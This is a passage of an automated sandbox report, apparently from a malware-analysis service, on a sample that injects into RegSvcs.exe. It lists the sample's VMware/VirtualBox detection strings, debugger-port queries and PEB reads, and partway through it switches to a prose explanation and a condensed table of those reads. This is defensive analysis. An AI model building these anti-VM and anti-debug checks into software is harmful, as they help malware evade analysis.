              Source: oxhvi.msc.exe, 00000016.00000003.1807788495.0000000000CD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exe536C7
              Source: oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then0\b
              Source: oxhvi.msc, 00000008.00000003.1655538130.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657788132.0000000000EFF000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1657811765.0000000000F02000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1656675919.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1937912252.0000000001908000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1939938542.000000000191D000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938671200.0000000001912000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938031796.000000000190C000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1939967299.0000000001920000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 0000001B.00000003.1938431517.000000000190F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exe
              Source: oxhvi.msc.exe, 0000001B.00000003.1860425798.00000000018C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenw
              Source: oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
              Source: M1Y6kc9FpE.exe, 00000000.00000003.1416105702.00000000004D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\4b
              Source: oxhvi.msc.exe, 0000001B.00000003.1938431517.000000000190F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareService.exeU
              Source: oxhvi.msc.exe, 00000016.00000003.1807405255.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807175907.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807463065.0000000000CCF000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1807788495.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1808791930.0000000000CDC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VBoxTray.exeU_
              Source: oxhvi.msc.exe, 0000001B.00000002.1942146299.0000000001898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VboxService.exe") Then\CO
              Source: oxhvi.msc, 00000008.00000003.1656675919.0000000000EF1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exeJ
              Source: oxhvi.msc, 00000008.00000003.1658126210.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658458510.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538146992.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1658223694.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc, 00000008.00000003.1538081889.0000000000E93000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then13rH
              Source: explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
              Source: oxhvi.msc.exe, 0000001B.00000003.1938431517.000000000190F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VboxService.exe
              Source: explorer.exe, 00000011.00000002.2639211861.0000000009330000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
              Source: oxhvi.msc.exe, 00000016.00000003.1808461197.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725806155.0000000000C85000.00000004.00000020.00020000.00000000.sdmp, oxhvi.msc.exe, 00000016.00000003.1725721941.0000000000C75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: If ProcessExists("VBoxTray.exe") Then
              Source: explorer.exe, 00000011.00000000.1635565811.0000000000A20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeAPI call chain: ExitProcess graph end nodegraph_0-30265
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscProcess information queried: ProcessInformation
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\netsh.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess queried: DebugPort
              Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_00409AB0 rdtsc 15_2_00409AB0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0040ACF0 LdrLoadDll,15_2_0040ACF0
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_005AF3FF BlockInput,8_2_005AF3FF
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A46878 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00A46878
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00535D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,8_2_00535D78
              Source: C:\Users\user\Desktop\M1Y6kc9FpE.exeCode function: 0_2_00A4ECAA mov eax, dword ptr fs:[00000030h]0_2_00A4ECAA
              Source: C:\Users\user\AppData\Local\Temp\RarSFX0\oxhvi.mscCode function: 8_2_00555078 mov eax, dword ptr fs:[00000030h]8_2_00555078
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01708158 mov eax, dword ptr fs:[00000030h]15_2_01708158
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166C156 mov eax, dword ptr fs:[00000030h]15_2_0166C156
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676154 mov eax, dword ptr fs:[00000030h]15_2_01676154
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01676154 mov eax, dword ptr fs:[00000030h]15_2_01676154
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov eax, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov eax, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov ecx, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov eax, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01704144 mov eax, dword ptr fs:[00000030h]15_2_01704144
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A0124 mov eax, dword ptr fs:[00000030h]15_2_016A0124
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01730115 mov eax, dword ptr fs:[00000030h]15_2_01730115
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171A118 mov ecx, dword ptr fs:[00000030h]15_2_0171A118
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171A118 mov eax, dword ptr fs:[00000030h]15_2_0171A118
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171A118 mov eax, dword ptr fs:[00000030h]15_2_0171A118
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171A118 mov eax, dword ptr fs:[00000030h]15_2_0171A118
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov ecx, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov ecx, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov ecx, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov eax, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171E10E mov ecx, dword ptr fs:[00000030h]15_2_0171E10E
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017461E5 mov eax, dword ptr fs:[00000030h]15_2_017461E5
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A01F8 mov eax, dword ptr fs:[00000030h]15_2_016A01F8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017361C3 mov eax, dword ptr fs:[00000030h]15_2_017361C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017361C3 mov eax, dword ptr fs:[00000030h]15_2_017361C3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov eax, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov eax, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov ecx, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov eax, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016EE1D0 mov eax, dword ptr fs:[00000030h]15_2_016EE1D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B0185 mov eax, dword ptr fs:[00000030h]15_2_016B0185
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F019F mov eax, dword ptr fs:[00000030h]15_2_016F019F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F019F mov eax, dword ptr fs:[00000030h]15_2_016F019F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F019F mov eax, dword ptr fs:[00000030h]15_2_016F019F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F019F mov eax, dword ptr fs:[00000030h]15_2_016F019F
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A197 mov eax, dword ptr fs:[00000030h]15_2_0166A197
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A197 mov eax, dword ptr fs:[00000030h]15_2_0166A197
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A197 mov eax, dword ptr fs:[00000030h]15_2_0166A197
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01714180 mov eax, dword ptr fs:[00000030h]15_2_01714180
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01714180 mov eax, dword ptr fs:[00000030h]15_2_01714180
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0172C188 mov eax, dword ptr fs:[00000030h]15_2_0172C188
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0172C188 mov eax, dword ptr fs:[00000030h]15_2_0172C188
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0169C073 mov eax, dword ptr fs:[00000030h]15_2_0169C073
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01672050 mov eax, dword ptr fs:[00000030h]15_2_01672050
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F6050 mov eax, dword ptr fs:[00000030h]15_2_016F6050
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01706030 mov eax, dword ptr fs:[00000030h]15_2_01706030
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A020 mov eax, dword ptr fs:[00000030h]15_2_0166A020
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166C020 mov eax, dword ptr fs:[00000030h]15_2_0166C020
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F4000 mov ecx, dword ptr fs:[00000030h]15_2_016F4000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01712000 mov eax, dword ptr fs:[00000030h]15_2_01712000
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E016 mov eax, dword ptr fs:[00000030h]15_2_0168E016
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E016 mov eax, dword ptr fs:[00000030h]15_2_0168E016
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E016 mov eax, dword ptr fs:[00000030h]15_2_0168E016
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0168E016 mov eax, dword ptr fs:[00000030h]15_2_0168E016
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166A0E3 mov ecx, dword ptr fs:[00000030h]15_2_0166A0E3
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016780E9 mov eax, dword ptr fs:[00000030h]15_2_016780E9
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F60E0 mov eax, dword ptr fs:[00000030h]15_2_016F60E0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0166C0F0 mov eax, dword ptr fs:[00000030h]15_2_0166C0F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016B20F0 mov ecx, dword ptr fs:[00000030h]15_2_016B20F0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F20DE mov eax, dword ptr fs:[00000030h]15_2_016F20DE
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017360B8 mov eax, dword ptr fs:[00000030h]15_2_017360B8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017360B8 mov ecx, dword ptr fs:[00000030h]15_2_017360B8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017080A8 mov eax, dword ptr fs:[00000030h]15_2_017080A8
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167208A mov eax, dword ptr fs:[00000030h]15_2_0167208A
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0171437C mov eax, dword ptr fs:[00000030h]15_2_0171437C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0173A352 mov eax, dword ptr fs:[00000030h]15_2_0173A352
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_01718350 mov ecx, dword ptr fs:[00000030h]15_2_01718350
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov ecx, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016F035C mov eax, dword ptr fs:[00000030h]15_2_016F035C
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA30B mov eax, dword ptr fs:[00000030h]15_2_016AA30B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA30B mov eax, dword ptr fs:[00000030h]15_2_016AA30B
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016AA30B mov eax, dword ptr fs:[00000030h]15_2_016AA30B
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Code functions in the injected RegSvcs.exe image that read fs:[00000030h]. In 32-bit Windows code the fs segment maps the current thread's TEB, and offset 0x30 of the TEB holds the pointer to the Process Environment Block (PEB); code fetches it to reach PEB fields such as BeingDebugged (+0x02), Ldr (+0x0C, the loaded-module lists used for hand-rolled API resolution) and NtGlobalFlag (+0x68). Ordinary runtime code emits the same read, so one hit on its own is weak evidence; what is read through the pointer afterwards is what distinguishes an anti-debug or API-resolution routine. One row per code function, giving the register loaded and, as (xN), how many such reads the disassembler found in that function:

15_2_0166C310  mov ecx, dword ptr fs:[00000030h]
15_2_01690310  mov ecx, dword ptr fs:[00000030h]
15_2_016803E9  mov eax, dword ptr fs:[00000030h] (x8)
15_2_016A63FF  mov eax, dword ptr fs:[00000030h]
15_2_0168E3F0  mov eax, dword ptr fs:[00000030h] (x3)
15_2_017143D4  mov eax, dword ptr fs:[00000030h] (x2)
15_2_0167A3C0  mov eax, dword ptr fs:[00000030h] (x6)
15_2_016783C0  mov eax, dword ptr fs:[00000030h] (x4)
15_2_0171E3DB  mov eax, dword ptr fs:[00000030h] (x3); mov ecx, dword ptr fs:[00000030h] (x1)
15_2_016F63C0  mov eax, dword ptr fs:[00000030h]
15_2_0172C3CD  mov eax, dword ptr fs:[00000030h]
15_2_0169438F  mov eax, dword ptr fs:[00000030h] (x2)
15_2_0166E388  mov eax, dword ptr fs:[00000030h] (x3)
15_2_01668397  mov eax, dword ptr fs:[00000030h] (x3)
15_2_01720274  mov eax, dword ptr fs:[00000030h] (x12)
15_2_01674260  mov eax, dword ptr fs:[00000030h] (x3)
15_2_0166826B  mov eax, dword ptr fs:[00000030h]
15_2_016F8243  mov eax, dword ptr fs:[00000030h] (x1); mov ecx, dword ptr fs:[00000030h] (x1)
15_2_0166A250  mov eax, dword ptr fs:[00000030h]
15_2_01676259  mov eax, dword ptr fs:[00000030h]
15_2_0166823B  mov eax, dword ptr fs:[00000030h]
15_2_016802E1  mov eax, dword ptr fs:[00000030h] (x3)
15_2_0167A2C3  mov eax, dword ptr fs:[00000030h] (x5)
15_2_016802A0  mov eax, dword ptr fs:[00000030h] (x2)
15_2_017062A0  mov eax, dword ptr fs:[00000030h] (x5); mov ecx, dword ptr fs:[00000030h] (x1)
15_2_016F0283  mov eax, dword ptr fs:[00000030h] (x3)
15_2_016AE284  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016A656A  mov eax, dword ptr fs:[00000030h] (x3)
15_2_01678550  mov eax, dword ptr fs:[00000030h] (x2)
15_2_0169E53E  mov eax, dword ptr fs:[00000030h] (x5)
15_2_01680535  mov eax, dword ptr fs:[00000030h] (x6)
15_2_01706500  mov eax, dword ptr fs:[00000030h]
15_2_01744500  mov eax, dword ptr fs:[00000030h] (x7)
15_2_016725E0  mov eax, dword ptr fs:[00000030h]
15_2_016AC5ED  mov eax, dword ptr fs:[00000030h] (x2)
15_2_0169E5E7  mov eax, dword ptr fs:[00000030h] (x8)
15_2_016AE5CF  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016765D0  mov eax, dword ptr fs:[00000030h]
15_2_016AA5D0  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016F05A7  mov eax, dword ptr fs:[00000030h] (x3)
15_2_016945B1  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016A4588  mov eax, dword ptr fs:[00000030h]
15_2_01672582  mov eax, dword ptr fs:[00000030h] (x1); mov ecx, dword ptr fs:[00000030h] (x1)
15_2_016AE59C  mov eax, dword ptr fs:[00000030h]
15_2_016FC460  mov ecx, dword ptr fs:[00000030h]
15_2_0169A470  mov eax, dword ptr fs:[00000030h] (x3)
15_2_016AE443  mov eax, dword ptr fs:[00000030h] (x8)
15_2_0169245A  mov eax, dword ptr fs:[00000030h]
15_2_0166645D  mov eax, dword ptr fs:[00000030h]
15_2_0166C427  mov eax, dword ptr fs:[00000030h]
15_2_0166E420  mov eax, dword ptr fs:[00000030h] (x3)
15_2_016F6420  mov eax, dword ptr fs:[00000030h] (x7)
15_2_016AA430  mov eax, dword ptr fs:[00000030h]
15_2_016A8402  mov eax, dword ptr fs:[00000030h] (x3)
15_2_016704E5  mov ecx, dword ptr fs:[00000030h]
15_2_016764AB  mov eax, dword ptr fs:[00000030h]
15_2_016A44B0  mov ecx, dword ptr fs:[00000030h]
15_2_016FA4B0  mov eax, dword ptr fs:[00000030h]
15_2_01678770  mov eax, dword ptr fs:[00000030h]
15_2_01680770  mov eax, dword ptr fs:[00000030h] (x12)
15_2_016A674D  mov esi, dword ptr fs:[00000030h] (x1); mov eax, dword ptr fs:[00000030h] (x2)
15_2_016FE75D  mov eax, dword ptr fs:[00000030h]
15_2_01670750  mov eax, dword ptr fs:[00000030h]
15_2_016F4755  mov eax, dword ptr fs:[00000030h]
15_2_016B2750  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016AC720  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016A273C  mov eax, dword ptr fs:[00000030h] (x2); mov ecx, dword ptr fs:[00000030h] (x1)
15_2_016EC730  mov eax, dword ptr fs:[00000030h]
15_2_016AC700  mov eax, dword ptr fs:[00000030h]
15_2_01670710  mov eax, dword ptr fs:[00000030h]
15_2_016A0710  mov eax, dword ptr fs:[00000030h]
15_2_016927ED  mov eax, dword ptr fs:[00000030h] (x3)
15_2_016FE7E1  mov eax, dword ptr fs:[00000030h]
15_2_016747FB  mov eax, dword ptr fs:[00000030h] (x2)
15_2_0167C7C0  mov eax, dword ptr fs:[00000030h]
15_2_016F07C3  mov eax, dword ptr fs:[00000030h]
15_2_016707AF  mov eax, dword ptr fs:[00000030h]
15_2_0171678E  mov eax, dword ptr fs:[00000030h]
15_2_016AA660  mov eax, dword ptr fs:[00000030h] (x2)
15_2_0173866E  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016A2674  mov eax, dword ptr fs:[00000030h]
15_2_0168C640  mov eax, dword ptr fs:[00000030h]
15_2_016A6620  mov eax, dword ptr fs:[00000030h]
15_2_016A8620  mov eax, dword ptr fs:[00000030h]
15_2_0167262C  mov eax, dword ptr fs:[00000030h]
15_2_0168E627  mov eax, dword ptr fs:[00000030h]
15_2_0168260B  mov eax, dword ptr fs:[00000030h] (x7)
15_2_016EE609  mov eax, dword ptr fs:[00000030h]
15_2_016B2619  mov eax, dword ptr fs:[00000030h]
15_2_016EE6F2  mov eax, dword ptr fs:[00000030h] (x4)
15_2_016F06F1  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016AA6C7  mov ebx, dword ptr fs:[00000030h] (x1); mov eax, dword ptr fs:[00000030h] (x1)
15_2_016AC6A6  mov eax, dword ptr fs:[00000030h]
15_2_016A66B0  mov eax, dword ptr fs:[00000030h]
15_2_01674690  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016B096E  mov eax, dword ptr fs:[00000030h] (x2); mov edx, dword ptr fs:[00000030h] (x1)
15_2_01714978  mov eax, dword ptr fs:[00000030h] (x2)
15_2_01696962  mov eax, dword ptr fs:[00000030h] (x3)
15_2_016FC97C  mov eax, dword ptr fs:[00000030h]
15_2_016F0946  mov eax, dword ptr fs:[00000030h]
15_2_016F892A  mov eax, dword ptr fs:[00000030h]
15_2_0170892B  mov eax, dword ptr fs:[00000030h]
15_2_016EE908  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016FC912  mov eax, dword ptr fs:[00000030h]
15_2_01668918  mov eax, dword ptr fs:[00000030h] (x2)
15_2_016FE9E0  mov eax, dword ptr fs:[00000030h]
15_2_016A29F9  mov eax, dword ptr fs:[00000030h] (x2)
15_2_0173A9D3  mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_017069C0 mov eax, dword ptr fs:[00000030h]15_2_017069C0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_0167A9D0 mov eax, dword ptr fs:[00000030h]15_2_0167A9D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016A49D0 mov eax, dword ptr fs:[00000030h]15_2_016A49D0
              Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeCode function: 15_2_016829A0 mov eax, dword ptr fs:[00000030h]15_2_016829A0
